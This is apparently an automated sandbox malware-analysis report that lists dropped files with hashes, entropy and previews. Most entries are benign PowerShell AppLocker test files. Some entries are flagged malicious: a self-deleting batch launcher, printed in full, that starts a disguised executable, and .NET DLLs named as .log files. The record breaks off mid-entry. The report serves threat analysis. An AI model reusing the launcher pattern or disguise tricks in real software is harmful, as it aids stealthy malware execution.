Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fnux213.vjw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5gcgkue.lba.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgg4fwff.xts.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5fzxtu2.rkm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dp3lhfnu.dqq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1bf3xbx.c35.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqdrgx3c.5ws.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtznc3vq.p4u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfv0fxfk.gtl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdrtntyh.nvn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nlnxit11.iqt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pjjhxqs2.tvk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_stvsxldk.ij5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4dm4tvd.qfu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umjn5jxu.u0i.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uo11wjv4.5fj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqzegsql.kke.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zk15ygm0.122.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\dDxCJXSQW6

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gjRSNFd1oJ

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hRUzw4veyD

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\m5NFm0sYZs

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\oQqq3TSPp6

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xDLjJLJ5P2.bat

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.279036023296266
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVuAoR4A5JPDPt4ASBktKcKZG1Ukh4E2J5xAIO1Xoh:hCRLuVFOOr+DE8RN5JPDPObKOZG1923b
MD5:	7A38C0F0FF2842B5A5165938D8622332
SHA1:	3CBCFD11AC5E2848A4F8E79BB3E7526536C66A4B
SHA-256:	3B120AC50342F0058DEA2234F00C73AC72643F95195F8B214E83A027140CDAAC
SHA-512:	217F376BDF59B954364EC4DA9912F63ABC9026066DD4D611365C1A6D2E02557F2F16678DCDF90EB11A65F0BB3E9960E54B99C272937F1124F1FAAA1AC804372B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\xDLjJLJ5P2.bat"

C:\Users\user\Desktop\AGJJGYBl.log

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Joe Sandbox View:	Filename: hjgesadfseawd.exe, Detection: malicious, Browse Filename: kyhjasehs.exe, Detection: malicious, Browse Filename: adjthjawdth.exe, Detection: malicious, Browse Filename: based.exe, Detection: malicious, Browse Filename: rvNK8fDa0k.exe, Detection: malicious, Browse Filename: RustChecker.exe, Detection: malicious, Browse Filename: T0jSGXdxX5.exe, Detection: malicious, Browse Filename: main.exe, Detection: malicious, Browse Filename: file_1443.exe, Detection: malicious, Browse Filename: lsass.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RzAxqjrs.log

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

C:\Users\user\Desktop\YmAdlBZw.log

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

C:\Users\user\Desktop\eyAdKmjt.log

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gMOMTVsR.log

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
